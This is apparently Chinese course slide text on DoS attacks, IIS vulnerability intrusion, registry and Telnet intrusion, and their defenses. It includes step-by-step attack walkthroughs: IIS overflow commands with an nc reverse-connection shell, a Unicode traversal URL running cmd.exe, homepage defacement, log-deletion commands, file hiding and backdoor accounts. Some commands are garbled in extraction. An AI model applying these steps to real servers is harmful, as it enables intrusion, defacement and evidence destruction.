第3章拒绝服务与数据库安全2

第3章拒绝服务与数据库安全DoS攻击原理DoS攻击工具的基本使用和防护基于漏洞的入侵和防护SQL数据库的安全和原理基于SQL的入侵和防护第一页，共七十一页。3.1拒绝服务DOS定义拒绝服务攻击的分类常见DOS攻击

分布式拒绝服务拒绝服务攻击的防护第二页，共七十一页。DOS的定义拒绝服务（Denialofservice）阻止或拒绝合法使用者存取网络服务器的一种破坏性工具。将大量的非法申请封包传送给指定目标主机，完全消耗目标主机资源，使系统无法使用。第三页，共七十一页。DOS的原理原理借助网络系统或协议的缺陷和配置漏洞进行网络攻击，使网络拥塞、系统资源耗尽或系统应用死锁，妨碍目标主机和网络系统对正常用户服务请求的及时响应，造成服务的性能受损甚至导致服务中断。第四页，共七十一页。DOS的攻击过程第五页，共七十一页。DOS的攻击思想和方法思想：服务器的缓冲区满，不接受新的请求。使用IP欺骗，迫使服务器将合法用户的连接复位。方法：资源消耗服务中止物理破坏第六页，共七十一页。DOS的攻击分类物理形式和逻辑形式按攻击的目标节点型主机型攻击应用型攻击网络连接型按照攻击方式资源消耗服务中止物理破坏按受害者类型服务器端拒绝服务攻击客户端拒绝服务攻击第七页，共七十一页。常见的DOS攻击Land程序攻击SYNFlood攻击IP欺骗DoS攻击Smurf攻击PingofDeathTeardrop攻击WinNuke攻击

第八页，共七十一页。分布式拒绝服务（DDOS）DDoS攻击分为：攻击者、主控端和代理端第九页，共七十一页。DDOS工具TrinooTFNTFN2KStacheldraht独裁者DDoS攻击器第十页，共七十一页。DOS攻击的防护（一）根据异常情况分析使用DDoS检测工具防护措施从四个方面下手：从网络流量中精确的区分攻击流量并阻断然后检测发现攻击，降低攻击对服务的影响在网络多个边界进行部署，阻断内外不同类型的攻击最后保障网络系统具备很强的扩展性和良好的可靠性第十一页，共七十一页。DOS攻击的防护（二）防护措施：增加网络核心设备的冗余性通过路由器配置访问列表过滤掉非法流量部署防火墙，提高网络抵御网络攻击的能力部署入侵检测设备，提高对不断更新的DOS攻击的识别和控制能力第十二页，共七十一页。3.2基于漏洞的入侵和防护基于IIS漏洞的入侵和防护基于电子邮件服务的入侵和防护基于注册表的入侵和防护基于Telnet的入侵和防护第十三页，共七十一页。IIS漏洞概述IIS（InternetInformationServer），即Internet信息服务器，它在Windows系统中提供Internet服务，例如Web服务、FTP服务、SMTP服务等。IIS服务器在方便用户使用的同时，带来了许多安全隐患。IIS漏洞有近千余种，其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。对于溢出型漏洞，入侵者可以通过发送特定指令格式的数据使远程服务区的缓冲区溢出，从而突破系统的保护，在溢出的空间中执行任意指令。第十四页，共七十一页。主要的IIS漏洞.ida&.idq漏洞.Printer漏洞Unicode漏洞.asp映射分块编码漏洞WebDAV漏洞第十五页，共七十一页。IIS漏洞信息的搜集使用扫描软件扫描存在漏洞的主机，例如使用X-Scan进行IIS漏洞的扫描使用telnettargetIP80搜集Web服务器版本信息第十六页，共七十一页。.ida&.idq漏洞微软的IndexServer可以加快Web的搜索能力，提供对管理员脚本河Internet数据的查询，默认支持管理脚本.ida和查询脚本.idq。管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的。idq.dll存在一个缓冲溢出，问题存在于idq.dll扩展程序上，由于没有对用户提交的输入参数进行边界检查，可以导致远程攻击者利用溢出来获得System权限访问远程系统。第十七页，共七十一页。.ida&.idq漏洞的检测第十八页，共七十一页。IDQ入侵工具—IISIDQIISIDQ有命令行和图形界面两种方式。使用IISIDQ攻击远程服务器后，有两种登录方式：攻击后主动连接方式命令

iisidq.exe<操作系统类型><目标IP><Web端口><1><端口监听端口>[输入命令1]攻击后监听远程服务器连接命令iisidq.exe<操作系统类型><目标IP><Web端口><2><溢出连接IP><溢出连接端口>[输入命令1]如果不写输入命令，默认命令为cmd.exe/c+dir。如果使用1，表示不使用默认命令而是要用户输入命令。第十九页，共七十一页。IISIDQ支持的操作系统类型0IIS5中文Win2000Sp01IIS5中文Win2000Sp12IIS5中文Win2000Sp2第二十页，共七十一页。漏洞溢出连接工具-NCnc在网络工具中有“瑞士军刀”的美誉，通过nc，入侵者可以方便的连接远程服务器。nc有两种方法进行连接主动连接到外部：nc[-options]hostnameport[s][ports]监听等待外部连接：nc-l-pport[-option][hostname][port]第二十一页，共七十一页。NC的使用参数说明-e:prog程序重定向，一旦连接，就执行-g:网关路由跳数,可设置到8-h：帮助信息-i：secs延时的间隔-l：监听模式，用于入站连接-n：指定数字的IP地址，不能用hostname-o：file记录16进制的传输-p：port本地端口号-r：任意指定本地及远程端口-s：addr本地源地址-u：UDP模式-v：详细输出（用两个-v可得到更详细的内容）-w：secs超时时间-z：将输入输出关掉——用于扫描时第二十二页，共七十一页。.idq入侵实例（一）步骤一：扫描远程服务器步骤二：IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq006801521第二十三页，共七十一页。.idq入侵实例（一）步骤三：使用nc进行连接。使用命令nc–v06521。第二十四页，共七十一页。.idq入侵实例（一）步骤四：建立后门帐号步骤五：使用exit命令断开连接比较命令如图所示第二十五页，共七十一页。.idq入侵实例（二）步骤一：扫描远程服务器步骤二：使用nc在本地打开端口等待连接。使用命令nc-l–p250。参数-l表示使用监听模式，-p表示设置本地监听端口250

第二十六页，共七十一页。.idq入侵实例（二）步骤三：IDQ溢出。使用命令iisidq006802002501采用方式二进行溢出，使远程服务器溢出后自动连接到本地计算机的250端口第二十七页，共七十一页。.idq入侵实例（二）步骤四：进行溢出后的攻击步骤五：建立后门帐号步骤六：使用exit命令断开连接第二十八页，共七十一页。IISIDQ的图形界面第二十九页，共七十一页。.printer漏洞windows2000IIS5存在打印扩展ISAPI（InternetServiceApplicationProgrammingInterface），使得.printer扩展与msw3prt.dll进行映射，该扩展可以通过Web调用打印机。在msw3prt.dll中存在缓冲区溢出漏洞。微软建议，一般在未打补丁之前，一定要移除ISAPI网络打印的映射。第三十页，共七十一页。.printer漏洞入侵步骤一：使用nc监听端口步骤二：使用IIS5Exploit进行漏洞溢出，命令格式IIS5Exploit<目标IP><入侵者IP><本地监听端口>第三十一页，共七十一页。Unicode目录遍历漏洞微软IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“\”，从而可以利用“../”目录遍历的漏洞该漏洞帐号默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑分区上的能被这些组访问的文件都能被删除，修改或执行入侵者不能像使用.ida和.idq漏洞那样，直接溢出一个拥有管理员权限的shell，而只是具有IUSR_machinename权限，也就是说，只能进行简单的文件操作。使用Unicode构造“/”和“\”字符举例%c1%1c—>(0xc1-0xc0)*0x40+0x1c=0x5c=‘/’%c0%2f—>(0xc0-0xc0)*0x40+0x2f=0x2f=‘\’第三十二页，共七十一页。手工检测漏洞远程系统Windows2000server中文版在地址栏输入：:\”第三十三页，共七十一页。命令说明命令中的“+”，代表空格06远程服务器IP地址scripts为远程服务器上的脚本文件目录“..%c1%1c..”被远程服务器译为“../”winnt/system32/cmd.exe?/c+打开远程服务器的cmd.exe，一般不用改变dir+c:\入侵者要执行的命令利用此命令，入侵者将IE编程了远程命令的控制台第三十四页，共七十一页。Unicode入侵实例—涂鸦主页步骤一：准备标语主页，并保存成index.htm步骤二：探知远程服务器的Web根目录方法一：利用.ida或者.idq漏洞。方法二：输入:\mmc.gif/s其中，/s表示在dir命令后查找指定文件或文件夹的物理路径，mmc.gif是默认安装在Web根目录中的，找到该文件的同时，也就找到了Web根目录。第三十五页，共七十一页。Unicode入侵实例—涂鸦主页步骤三：涂鸦主页。在地址栏中使用Unicode漏洞查询Web服务器主页，假设是index.htm。使用tftp将自己做好的主页替换掉原Web服务器的主页。tftp的使用tftp只要执行t，本计算机就成为一台tftp服务器使用windows自带的tftp命令便可以在该服务器上传和下载文件使用方法:tftp[-i]host[GET/PUT]source[destination]-i 二进制文件传输host tftp服务器地址Get 下载文件PUT 上传文件source 文件名destination 目的地第三十六页，共七十一页。Unicode入侵实例—涂鸦主页第三十七页，共七十一页。Unicode入侵实例—涂鸦主页第三十八页，共七十一页。Unicode漏洞的实例二—擦脚印通过Unicode漏洞进入远程服务器后，肯定会在该服务器上留下自己的ip，为了隐藏自己，通常需要清除服务器的日志，这种做法叫作擦脚印。del+c:\winnt\system32\logfiles\*.*del+c:\winnt\system32\confige\*.evtdel+c:\winnt\system32\dtclog\*.*del+c:\winnt\system32\*.logdel+c:\winnt\system32\*.txtdel+c:\winnt\*.txtdel+c:\winnt\*.logUnicode获得的权限较低，一般无法执行bat文件。第三十九页，共七十一页。Unicode漏洞实例三—修改文件属性入侵过程中，入侵者通常希望隐藏自己的文件。如果上传的文件设置成“隐藏”加“系统”属性，就可以避免被发现。Attrib命令的使用：Attrib[+R|-R][+A|-A][+S|-S][+H|-H][[drive:][path]][/S/D]+:设置属性-:清除属性R:只读文件属性A：存档文件属性S：系统文件属性H：隐藏文件属性/S：处理当前文件夹及其子文件夹中的匹配文件/D：处理文件夹。第四十页，共七十一页。Unicode漏洞实例三—修改文件属性如果要把c盘中的abc.exe设置成“系统”加“隐藏”属性，使用命令“attrib.exe+%2bH+%2bS+c:\abc.exe”其中，“%2b”表示“+”号。类似，要取消掉隐藏和系统属性，使用命令“attrib.exe+-H+-S+c:\abc.exe”。第四十一页，共七十一页。.ASP映射分块编码漏洞Windows2000和NT4IIS.asp映射存在远程缓冲溢出漏洞。ASPISAPI过滤器默认在所有NT4和WIN2000系统中装载，存在的漏洞可以导致远程执行任意命令。恶意攻击者可以使用分块编码形式数据给IIS服务器，当解码和解析这些数据的时候可以强迫IIS把入侵者提供的数据写到内存任意位置。通过此漏洞可以导致WIN2000系统产生缓冲溢出并以IWAM_computer_name用户的权限执行任意代码，而在WINDOWSNT4下可以以system的权限执行任意代码。第四十二页，共七十一页。.ASP映射分块编码漏洞使用工具：IISASP.DLLOVERFLOWPROGRAM2.0Aspcode使用方法：aspcode<server>[aspfile][webport][winxp]或aspcode<server>参数说明：<server>:远程服务器[aspfile]:远程服务器上ASP文件所在的路径。[Webport]:远程服务器web服务端口。[winxp]:winxp模式。第四十三页，共七十一页。WebDAV远程缓冲区漏洞Microsoft5.0带有WebDav组件对用户输入的传递给ntdll.dll程序处理的请求未做充分的边界检查，远程入侵者可以向WebDav提交一个精心构造的超长数据请求而导致缓冲区溢出，使得入侵者以LocalSystem权限在主机上执行任意指令。漏洞检测工具WebDavScan

第四十四页，共七十一页。WebDAV远程缓冲区漏洞漏洞利用工具wd0.3-en.exe：英文版IIS溢出工具，与nc配合使用BIG5.exe：繁体版IIS溢出工具Webdavx3：中文版IIS溢出工具，溢出后打开7788端口等待连接WebDAV：突破防火墙的WebDAV溢出工具第四十五页，共七十一页。IIS6.0Web安全漏洞解决方案转移Web根目录设置IIS目录的权限为只读删除全部默认安装目录，并禁止任何脚本、应用程序执行，并删除应用程序配置里面的“ISAPI”应用程序、禁止脚本测试等。设置安全日志并存在安全的路径下。安装网络防火墙，并禁用除80端口以外所有端口的内外通信连接。备份文件并保存。第四十六页，共七十一页。基于电子邮件的漏洞IMAP和POP漏洞拒绝服务（DoS）攻击系统配置漏洞默认配置空的/默认根密码漏洞创建利用软件问题缓冲区溢出意外组合未处理的输入利用人为因素特洛伊木马及自我传播远程访问数据发送破坏拒绝服务代理第四十七页，共七十一页。基于电子邮件漏洞的解决方案在电子邮件系统周围锁定电子邮件系统—电子邮件系统周边控制开始于电子邮件网关的部署。确保外部系统访问的安全性—电子邮件安全网关必须负责处理来自所有外部系统的通信，并确保通过的信息流量是合法的。实时监视电子邮件流量—实时监视电子邮件流量对于防止黑客利用电子邮件访问内部系统是至关重要的。

电子邮件安全网关能够轻松集成，并被使用者轻松配置。第四十八页，共七十一页。注册表的入侵在早期的DOS系统中，系统通过使用BAT文件来为DOS系统加载驱动程序。Windwos3.x中，系统通过Win.ini、System.ini、Control.ini、program.ini等INI文件来保存操作系统的软、硬件的配置信息和驱动程序（INI文件最大64KB）。从Windows95开始，通过注册表，用户便可以轻易的添加、删除、修改系统内的软、硬件配置信息和驱动程序。第四十九页，共七十一页。注册表的分层结构第五十页，共七十一页。开启远程主机的注册表入侵者通过远程控制和入侵注册表需要的条件建立IPC$连接开启远程注册表服务第五十一页，共七十一页。开启远程主机的注册表开启远程注册表服务的过程如下：建立IPC$连接打开“计算机管理”，用“计算机管理”管理远程计算机开启远程注册表服务关闭“计算机管理”，断开IPC$连接第五十二页，共七十一页。连接远程主机的注册表入侵者可以通过Windows自带的工具连接远程主机的注册表并进行修改。步骤一：执行regedit来打开注册表编辑器步骤二：建立IPC$连接步骤三：连接远程主机注册表（选择“注册表”—”连接网络注册表”）步骤四：断开网络注册表第五十三页，共七十一页。注册表reg文件的编辑入侵者除了使用注册表编辑器编辑注册表外，还可以通过手工倒入reg文件修改远程主机的注册表。reg文件是Windows系统中一种特定格式的文本文件，它是为注册表的信息编辑而设计的文件。通过reg可以修改注册表的任意一项，但是通过网络连接珠册表编辑器一般只能看到三个根项。第五十四页，共七十一页。使用reg文件修改注册表实例步骤一：打开记事本，然后编辑添加主键，在记事本中写入：REGEDIT4[HKEY_CURRENT_USERS\Software\HACK]第五十五页，共七十一页。使用reg文件修改注册表实例步骤二：保存文件为test1.reg，双击该文件，便建立了HACK主键。第五十六页，共七十一页。使用reg文件修改注册表实例步骤三：为HACK主键建立一个名字为“NAME”，类型为“DWORD”，值为“00000000”的键值项。步骤四：打开记事本，写入：REGEDIT4[HKEY_CURRENT_USER\Software\HACK]“NAME”=dword:00000000保存为TEST2.REG文件，然后双击导入。第五十七页，共七十一页。使用reg文件修改注册表实例步骤五：删除键值项REGEDIT4[HKEY_CURRENT_USER\Software\HACK]“NAME”=-步骤六：删除主键REGEDIT4[-HKEY_CURRENT_USERS\Software\HACK]第五十八页，共七十一页。命令行导入上面实例中通过双击导入注册表，容易被远程主机管理员发现，因为每次导入都会有提示对话框第五十九页，共七十一页。命令行导入通过命令行倒入使用专门的注册表导入工具使用windows系统自带的导入工具windows自带的导入工具使用命令：regedit/s<reg文件>regedit是系统自带的命令，不使用任何工具。/s表示不需要询问，直接倒入第六十页，共七十一页。Telnet入侵的防护方法禁用Telnet服务。防范IPC漏洞，禁用建立空连接打开注册表编辑器，找到子项HKEY_LOCAL_MACHINE\SYSTEM\

CurrentControlSet\Control\LSA，把RestrictAnonymous=DWORD的键值改为：00000001。第六十一页，共七十一页。3.3SQL数据库安全